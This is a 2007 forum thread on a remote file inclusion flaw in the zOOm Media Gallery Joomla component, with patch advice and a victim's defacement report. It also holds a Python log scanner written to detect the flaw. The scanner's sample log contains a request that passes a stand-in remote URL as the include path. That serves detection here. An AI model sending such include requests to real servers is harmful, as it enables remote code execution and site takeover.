Zoom Media Gallery version 2.5.1 RC4 and prior

Posted: Sat Apr 14, 2007 12:26 pm
by brian
A vulnerability has been identified in zOOm Media Gallery, which could be exploited by remote attackers to execute arbitrary commands. This issue is due to an input validation error in the "lib/iptc/EXIF_Makernote.php" script that does not validate the "mosConfig_absolute_path" parameter, which could be exploited by remote attackers to include malicious PHP scripts and execute arbitrary commands with the privileges of the web server.

Source  http://www.frsirt.com/english/advisories/2007/1353
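
A log check for the request shape the advisory above describes, added here as an example and not part of the original thread: it flags access-log entries where a client supplies "mosConfig_absolute_path" to EXIF_Makernote.php. The log lines are constructed samples in Combined Log Format, and the function name and reason strings are assumptions of this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script and parameter named in the advisory quoted in this thread.
SCRIPT = "/lib/iptc/exif_makernote.php"
PARAM = "mosConfig_absolute_path"

# Combined Log Format: client IP first, then "METHOD target PROTOCOL" and status.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3})')
URL_RE = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.IGNORECASE)


def find_suspect_requests(lines):
    """Return (client_ip, status, reason) for every request that passes
    mosConfig_absolute_path to EXIF_Makernote.php in the query string.
    The value is server-side configuration; a client never needs to send it."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, target, status = m.groups()
        parts = urlsplit(target)
        if not parts.path.lower().endswith(SCRIPT):
            continue
        # parse_qs percent-decodes names and values, so encoded forms match too.
        for value in parse_qs(parts.query, keep_blank_values=True).get(PARAM, []):
            if URL_RE.match(value.strip()):
                reason = "remote URL as include path"
            else:
                reason = "client-supplied include path"
            hits.append((ip, status, reason))
    return hits


# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '198.51.100.4 - - [14/Apr/2007:12:20:11 +0000] "GET /index.php?option=com_zoom&Itemid=5 HTTP/1.1" 200 8123',
    '203.0.113.7 - - [14/Apr/2007:12:30:01 +0000] "GET /components/com_zoom/lib/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http%3A%2F%2Fhost.example.invalid%2Fx.txt HTTP/1.1" 200 512',
    '203.0.113.9 - - [14/Apr/2007:12:31:44 +0000] "GET /components/com_zoom/lib/iptc/EXIF_Makernote.php?mosConfig_absolute_path=%2Ftmp%2F HTTP/1.1" 404 210',
    '198.51.100.4 - - [14/Apr/2007:12:40:02 +0000] "GET /components/com_zoom/lib/iptc/EXIF_Makernote.php HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for hit in find_suspect_requests(SAMPLE_LOG):
        print(hit)
```

Parameters sent in a POST body or a cookie do not appear in an access log, so an empty result does not clear the host.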

Re: Zoom Media Gallery version 2.5.1 RC4 and prior

Posted: Sat Apr 14, 2007 9:17 pm
by mikedeboer
I already knew about this vulnerability in ZMG, and I fixed it a while back too... It just hasn't been released yet - because I didn't have the time to do it!

To be honest, I don't have the time anymore to work on ZMG. I need some developers... and fast! You know anyone? :P

Re: Zoom Media Gallery version 2.5.1 RC4 and prior

Posted: Sat Apr 14, 2007 9:58 pm
by brian
Sorry Mike, not my strong point.

Maybe put a post asking for developers in another part of the forum.

Re: Zoom Media Gallery version 2.5.1 RC4 and prior

Posted: Sun Apr 15, 2007 5:07 pm
by ZZzzzz
mikedeboer wrote: I already knew about this vulnerability in ZMG, and I fixed it a while back too... It just hasn't been released yet - because I didn't have the time to do it!

To be honest, I don't have the time anymore to work on ZMG. I need some developers... and fast! You know anyone? :P
Hi Mike where I can sign-up.

Re: Zoom Media Gallery version 2.5.1 RC4 and prior

Posted: Mon Apr 16, 2007 8:30 am
by mikedeboer
Thanks Brian, I will.
ZZzzzz wrote: Hi Mike where I can sign-up.
If it's possible, could you send a short resume (or something listing your experience) to 'mike AT zoomfactory DOT org'...or simply PM me :)

Re: Zoom Media Gallery version 2.5.1 RC4 and prior

Posted: Mon Apr 16, 2007 1:13 pm
by ZZzzzz
To fix the security please update the EXIF_Makernote.php and EXIF.php with the ones included in this attachment.
Put it in the /components/com_zoom/lib/iptc/

a new release will be available soon on the zoom factory website

http://www.zoomfactory.org

Re: Zoom Media Gallery version 2.5.1 RC4 and prior

Posted: Thu May 03, 2007 10:44 pm
by a.fraile
brian wrote: which could be exploited by remote attackers to include malicious PHP scripts and execute arbitrary commands with the privileges of the web server.
I suppose that includes putting an .asp file containing facilities to examine your site files and deface it anytime (see attached screenshot)? Or should I be looking for something else here?

It worries me that once they put that file on your site, they can get your db details from configuration.php. You can imagine they can get whatever ftp account details are stored unprotected in any of the php files, for example in file safemode.php which is used by ZoomGallery component for allowing image uploading when/if safe mode is set to on, which many hosting providers still do today...

Any solution to protecting the db account details? How does Joomla address this, i.e. information in configuration.php being exposed? I know upgrading to the latest Joomla version and the latest versions of 3rd party add-ons is critical but there will always be security flaws to fix surely.

Regards,

A.Fraile

EDIT MOD: image doing publicity for hacker removed. No need to help the hackers.  ;)

Re: Zoom Media Gallery version 2.5.1 RC4 and prior

Posted: Sun Jul 08, 2007 11:10 am
by althoffm
ZZzzzz wrote: To fix the security please update the EXIF_Makernote.php and EXIF.php with the ones included in this attachment.
Put it in the /components/com_zoom/lib/iptc/ a new release will be available soon on the zoom factory website
http://www.zoomfactory.org
Bit confused but if I understand right from Zoom forum messages.

1. The hack will not work if register globals is set off in both php as well as globals.php?
2. If using rc4 or prior your patch should be applied? Is the patch applied in the latest Zoom download on the Zoom website? Why is the patch not available from the official Zoom website?

Re: Zoom Media Gallery version 2.5.1 RC4 and prior

Posted: Fri Dec 28, 2007 6:04 pm
by cadenza
Hi!!

need urgent help! my site has been defaced! a gif picture had been added to the ZMG main page between 2 of my galleries. How can I get rid of it?

Re: Zoom Media Gallery version 2.5.1 RC4 and prior

Posted: Fri Dec 28, 2007 7:35 pm
by althoffm
cadenza wrote: Hi!! need urgent help! my site has been defaced! a gif picture had been added to the ZMG main page between 2 of my galleries. How can I get rid of it?
Can we have some more information: which version are you using, did you apply the security patch posted by Mike, your security settings, globals, etc.?

Re: Zoom Media Gallery version 2.5.1 RC4 and prior

Posted: Sat Dec 29, 2007 4:16 am
by cadenza
I am currently using ver 2.5.1 RC1. Nope, yet to apply the files. Pardon me to ask where to find the 2 update files mentioned earlier on in this thread?

any idea how I can remove the inserted gif in between my photo galleries? which file has been changed in ZMG directory? I know the file name of the inserted picture but do seem to be able to locate it in my server directories/files...

Thanks in advance!

Re: Zoom Media Gallery version 2.5.1 RC4 and prior

Posted: Sun Dec 30, 2007 1:25 pm
by althoffm
cadenza wrote: I am currently using ver 2.5.1 RC1. Nope, yet to apply the files. Pardon me to ask where to find the 2 update files mentioned earlier on in this thread? any idea how I can remove the inserted gif in between my photo galleries? which file has been changed in ZMG directory? I know the file name of the inserted picture but do seem to be able to locate it in my server directories/files...
There is a vulnerability [1] in all versions prior to 2.5.1 RC4. I would start by removing your current version, since it is hard to tell which files have been compromised, and load the latest version from the Zoom website [2]. For the patch posted in this thread you have to log in; the second message from ZZzzzz (April 16, 2007, 09:13:21 AM) contains the file.

[1] http://help.joomla.org/component/option ... temid,268/
[2] http://www.zoomfactory.org/index.php?op ... elect&id=1

Re: Zoom Media Gallery version 2.5.1 RC4 and prior

Posted: Sun Dec 30, 2007 2:37 pm
by cadenza
Thanks! but is there a way to do it so that my existing galleries will remain? ie. upgrade instead of a re-installation?